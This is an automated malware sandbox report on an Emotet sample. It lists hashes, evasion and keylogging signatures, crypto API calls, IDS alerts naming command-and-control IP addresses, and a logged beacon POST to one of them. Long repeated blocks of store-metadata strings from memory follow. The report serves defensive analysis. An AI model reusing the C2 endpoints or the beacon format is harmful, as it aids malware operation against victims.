Analysis Report 8e1c4bf4d7639eeb253500f744cbbff5

Overview

General Information

Sample Name: 8e1c4bf4d7639eeb253500f744cbbff5 (renamed file extension from none to exe)
Analysis ID: 318782
MD5: aa4919c8592f60ac4c030c36afa15b6d
SHA1: beec382ae4c60156672b5149f4661c5c2c4a9044
SHA256: 08634d6cb66d90bc78964c9c34f929b1f545450abd316f15d002970f24a5cdf1

Most interesting Screenshot:

Detection

Emotet
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B21D0 CryptDuplicateHash,CryptDestroyHash,CryptGetHashParam,CryptEncrypt,GetProcessHeap,RtlAllocateHeap,memcpy,CryptExportKey, 2_2_023B21D0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B2590 CryptCreateHash,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalFree,CryptGenKey,GetProcessHeap,HeapFree, 2_2_023B2590
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B1F28 CryptDecrypt, 2_2_023B1F28
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B1F10 CryptDecrypt,CryptDestroyHash,memcpy,CryptDuplicateHash,CryptVerifySignatureW,GetProcessHeap,HeapFree, 2_2_023B1F10
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B21D0 CryptDuplicateHash,CryptDestroyHash,CryptGetHashParam,CryptEncrypt,GetProcessHeap,RtlAllocateHeap,memcpy,CryptExportKey, 2_2_023B21D0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B2590 CryptCreateHash,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalFree,CryptGenKey,GetProcessHeap,HeapFree, 2_2_023B2590
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B1F28 CryptDecrypt, 2_2_023B1F28
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B1F10 CryptDecrypt,CryptDestroyHash,memcpy,CryptDuplicateHash,CryptVerifySignatureW,GetProcessHeap,HeapFree, 2_2_023B1F10
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A38A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 0_2_022A38A0
Source: C:\Users\user\Desktop\8e1c4bf4d7639eeb253500f744cbbff5.exe Code function: 0_2_022A38A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 0_2_022A38A0
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B38A0 _snwprintf,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,FindClose, 2_2_023B38A0

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.4:49740 -> 200.59.6.174:80
Source: Traffic Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.4:49757 -> 59.148.253.194:8080
Source: Traffic Snort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.4:49740 -> 200.59.6.174:80
Source: Traffic Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.4:49757 -> 59.148.253.194:8080
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49757 -> 59.148.253.194:8080
Source: global traffic TCP traffic: 192.168.2.4:49757 -> 59.148.253.194:8080
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 59.148.253.194 59.148.253.194
Source: Joe Sandbox View IP Address: 59.148.253.194 59.148.253.194
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HKBN-AS-APHongKongBroadbandNetworkLtdHK HKBN-AS-APHongKongBroadbandNetworkLtdHK
Source: Joe Sandbox View ASN Name: HKBN-AS-APHongKongBroadbandNetworkLtdHK HKBN-AS-APHongKongBroadbandNetworkLtdHK
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.4:49740 -> 200.59.6.174:80
Source: global traffic TCP traffic: 192.168.2.4:49740 -> 200.59.6.174:80
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /WZ4u9y9gHo/wqXkw7ZJbNxF/KcFuzx5yTjyp/TRiUHKc196T5UY/GqpqONl17/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 59.148.253.194/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------FmCOHZhPaWdjvqUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 59.148.253.194:8080Content-Length: 4660Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /WZ4u9y9gHo/wqXkw7ZJbNxF/KcFuzx5yTjyp/TRiUHKc196T5UY/GqpqONl17/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 59.148.253.194/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------FmCOHZhPaWdjvqUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 59.148.253.194:8080Content-Length: 4660Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 200.59.6.174
Source: unknown TCP traffic detected without corresponding DNS query: 200.59.6.174
Source: unknown TCP traffic detected without corresponding DNS query: 200.59.6.174
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 200.59.6.174
Source: unknown TCP traffic detected without corresponding DNS query: 200.59.6.174
Source: unknown TCP traffic detected without corresponding DNS query: 200.59.6.174
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: unknown TCP traffic detected without corresponding DNS query: 59.148.253.194
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B2940 GetProcessHeap,RtlAllocateHeap,InternetReadFile,GetProcessHeap,HeapFree,HttpQueryInfoW, 2_2_023B2940
Source: C:\Windows\SysWOW64\mfdvdec\Windows.StateRepositoryClient.exe Code function: 2_2_023B2940 GetProcessHeap,RtlAllocateHeap,InternetReadFile,GetProcessHeap,HeapFree,HttpQueryInfoW, 2_2_023B2940
Source: svchost.exe, 00000007.00000002.771405969.0000028A67B15000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000007.00000002.771405969.0000028A67B15000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000007.00000003.759491776.0000028A67B6E000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z||.||18ebec36-1675-40c0-a5d4-25e9e774360f||1152921505692410033||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000007.00000003.759491776.0000028A67B6E000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z||.||18ebec36-1675-40c0-a5d4-25e9e774360f||1152921505692410033||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000007.00000003.761768611.0000028A67B5A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE2 equals www.facebook.com (Facebook)
Source: svchost.exe, 00000007.00000003.761768611.0000028A67B5A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE2 equals www.twitter.com (Twitter)
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 